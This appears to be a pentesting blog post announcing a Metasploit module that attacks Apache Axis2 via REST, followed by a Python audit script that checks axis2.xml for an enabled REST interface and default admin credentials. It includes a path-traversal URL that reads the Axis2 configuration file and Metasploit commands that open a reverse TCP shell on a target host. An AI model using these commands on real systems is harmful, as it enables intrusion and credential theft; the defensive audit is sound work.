http://www.focusecurity.org/category/Metasploit
axis2/services/Version?xsd=../conf/axis2.xml
Last weekend at OWASP BASC 2010, I created another version of the Axis2 Deployer exploit which uses REST instead of SOAP. This is important because pentesters may need to exploit Axis2 via REST, since SOAP may be disabled in certain environments. This module will not work against SAP BusinessObjects since the dswsbobje.war module has the REST interface disabled by default. I have tested the module against Axis2 1.5.2.
The REST version of the Axis2 Deployer Exploit module can be found here.
In essence, this module adds more flexibility for everyone who is pentesting an environment with Axis2.
Example usage:
use exploit/multi/http/axis2_deployer_rest
set PATH /axis2
set RHOST 192.168.33.128
set payload java/shell/reverse_tcp
set target 0
set LHOST 192.168.33.1
set LPORT 13337
exploit -j
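On the defensive side, the post's point that the module depends on the REST interface being enabled can be checked in conf/axis2.xml. The following is an added example, not code from the original post or from the Metasploit module: it audits the top-level `disableREST`, `userName` and `password` parameters. The sample XML is constructed, and treating a missing `disableREST` as "REST enabled" is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample resembling the top-level parameters of conf/axis2.xml.
SAMPLE_AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
    <parameter name="disableREST" locked="false">false</parameter>
    <transportReceiver name="http">
        <parameter name="port">8080</parameter>
    </transportReceiver>
</axisconfig>"""


def top_level_params(xml_text):
    """Return {name: value} for <parameter> elements directly under the root."""
    root = ET.fromstring(xml_text)
    # findall("parameter") matches direct children only, so parameters nested
    # in transports or modules are not mistaken for global settings.
    return {p.get("name"): (p.text or "").strip() for p in root.findall("parameter")}


def audit_axis2(xml_text):
    """Return a list of findings relevant to the Axis2 admin/REST exposure."""
    params = top_level_params(xml_text)
    findings = []

    # Assumption: when disableREST is absent, REST is treated as enabled.
    if params.get("disableREST", "false").lower() != "true":
        findings.append("REST interface enabled (disableREST is not 'true')")

    # Axis2 ships with admin/axis2 as the admin console credentials.
    if params.get("userName") == "admin" and params.get("password") == "axis2":
        findings.append("default admin console credentials (admin/axis2) in use")

    if not params.get("password"):
        findings.append("admin password parameter missing or empty")

    return findings


if __name__ == "__main__":
    for finding in audit_axis2(SAMPLE_AXIS2_XML):
        print("[!]", finding)
```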
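This article introduces a new Axis2 Deployer Exploit module that attacks through the REST interface instead of SOAP, adding flexibility for penetration testing. It applies to Axis2 version 1.5.2.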